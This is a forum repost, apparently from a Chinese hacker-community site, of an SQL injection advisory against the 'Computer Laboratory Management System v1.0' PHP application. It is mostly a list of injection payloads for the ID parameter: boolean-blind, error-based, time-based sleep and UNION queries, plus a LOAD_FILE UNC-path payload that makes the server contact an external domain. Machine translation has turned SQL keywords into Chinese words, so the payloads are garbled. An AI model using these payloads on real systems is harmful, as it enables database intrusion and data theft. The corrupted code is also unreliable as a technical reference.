H

计算机实验室管理系统v1.0-多sqli

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#title:计算机实验室管理系统v1.0-多sqli
#作者: nu11secur1ty
#日期: 03/28/2024
#vendor: https://github.com/oretnom23
#软件: https://www.sourcecodester.com/php/...ystem-using-php-and-mysql.html#comment-104400
#参考: https://portswigger.net/web-security/sql-invicement
#Description:
ID参数似乎容易受到SQL注入攻击的影响。
有效载荷'+(选择
load_file('\\\\ 95ctkydmc3d4ykhxxtph7p6xgamiagy71vsij68.tupgus.com \\ mpk'))+'
在ID参数中提交。此有效载荷注入SQL
使用UNC文件路径调用MySQL的LOAD_FILE函数的子查询
这引用了外部域上的URL。应用程序
与该域进行交互,表明注射的SQL查询
被执行。攻击者可以通过系统获取所有信息
使用此漏洞!
状态:高脆弱性
[+]有效载荷:
``MySQL
---
参数: ID(GET)
Type:基于布尔的盲人
title: Mysql Rlike Boolean盲人- 在哪里,订购
或小组按子句
payload: page=user/manage_userid=7''''
(2375=2375)然后0x372727 else0x28 end))和'fkkl'='fkkl
type:基于错误的
title: mysql=5.0和基于错误的- 在哪里,订购,订购或
小组划分(地板)
payload: page=user/manage_userid=7'''''和(选择1734
从(选择计数(*),Concat(0x716A707071,(Select)
(ELT(1734=1734,1)),0x71717A7871,地板(rand(0)*2))x来自
信息_schema.plugins组由x)a)和'cyrv'='cyrv
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload: page=user/manage_userid=7'''''和(从中选择6760
(Select(Sleep(7)))IMBE)和'XZWU'='XZWU
type:联合查询
title: mysql联合查询(null)-11列
payload: page=user/manage_userid=-2854'联合全部选择
NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6667579766666655555594373736B724A5A6875526F6F65 684562486C48664E4D624F75766B4A4444B43,0X71717A7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
 
后退
顶部